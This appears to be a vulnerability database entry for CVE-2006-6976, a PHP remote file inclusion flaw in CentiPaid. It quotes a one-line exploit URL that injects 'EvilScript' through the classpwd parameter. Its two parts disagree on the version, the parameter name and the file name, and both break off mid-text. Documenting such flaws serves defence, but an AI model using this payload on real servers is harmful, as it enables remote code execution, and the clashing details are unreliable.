CVE-2006-6976

CVE-2006-6976 is a PHP remote file inclusion vulnerability in CentiPaid 1.4.2 and earlier, affecting centipaid_class.php. The underlying issue allows remote attackers to execute arbitrary code by providing a URL in the absolute_path parameter. The impact is partial confidentiality, integrity, and...

CentiPaid-1.4.2.txt

Affected software description : Application : CentiPaid version : 1.4.3 URL : http://www.centipaid.com/centi/download/centipaidphp-1.4.3.tar.gz Code:centipaidclass.php include$classpwd.'/adodb/adodb.inc.php' Exploit: http://www.site.com/path/centipaidclass.php?classpwd=EvilScript...